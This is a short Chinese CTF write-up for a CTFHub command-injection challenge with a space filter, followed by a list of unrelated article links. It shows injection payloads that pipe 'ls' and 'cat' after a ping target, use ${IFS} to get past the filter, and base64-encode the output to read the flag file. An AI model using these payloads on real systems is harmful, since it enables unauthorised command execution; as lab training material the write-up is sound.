当前位置: 首页 > article >正文

CTFHub-RCE 命令注入-过滤空格

  • 观察源代码

    • 代码里面可以发现过滤了空格
  • 判断是Windows还是Linux

    • 源代码中有
      ping -c 4
      说明是Linux
  • 查看有哪些文件

    • 127.0.0.1|ls
  • 打开flag文件

    • 我们尝试将空格转义打开这个文件  利用  ${IFS}
      127.0.0.1|cat${IFS}flag_195671031713417.php
    • 可是发现 文本内容显示不出来,所以怀疑可能编码格式问题,有些内容无法显示(同上一节)
    • 我们尝试用base64编码
      127.0.0.1|cat${IFS}flag_195671031713417.php|base64
    • 再将内容base64 解码一下
    • 成功获取flag
http://www.lryc.cn/news/2394028.html

相关文章:

  • 卫生间改造翻新怎么选产品?我在瑞尔特找到了解决方案
  • C++ list数据删除、list数据访问、list反转链表、list数据排序
  • Express教程【002】:Express监听GET和POST请求
  • mysql安装教程--笔记
  • C++ 观察者模式:设计与实现详解
  • 【PostgreSQL 03】PostGIS空间数据深度实战:从地图服务到智慧城市
  • HIT-csapp大作业:程序人生-HELLO‘s P2P
  • 深入探讨redis:主从复制
  • 帕金森常见情况解读
  • 清华大学发Nature!光学工程+神经网络创新结合
  • 【android bluetooth 案例分析 04】【Carplay 详解 3】【Carplay 连接之车机主动连手机】
  • C++学习-入门到精通【11】输入/输出流的深入剖析
  • NW969NW978美光闪存颗粒NW980NW984
  • 使用 ssld 提取CMS 签名并重签名
  • 前端基础之《Vue(17)—路由集成》
  • 大厂前端研发岗位PWA面试题及解析
  • 第十四章 MQTT订阅
  • element ui 表格 勾选复选框后点击分页不保存之前的数据问题
  • DataAgent产品经理(数据智能方向)
  • 腾讯云推出云开发AI Toolkit,国内首个面向智能编程的后端服务
  • 华为计试——刷题
  • 【AI-安装指南】Redis Stack 的安装与使用
  • LeetCode Hot100(矩阵)
  • spark在执行中如何选择shuffle策略
  • 前端-不对用户显示
  • WPF【10_2】数据库与WPF实战-示例
  • Hive的数据倾斜是什么?
  • Cursor奇技淫巧篇(经常更新ing)
  • Unity3D仿星露谷物语开发58之保存时钟信息到文件
  • lstm 长短期记忆 视频截图 kaggle示例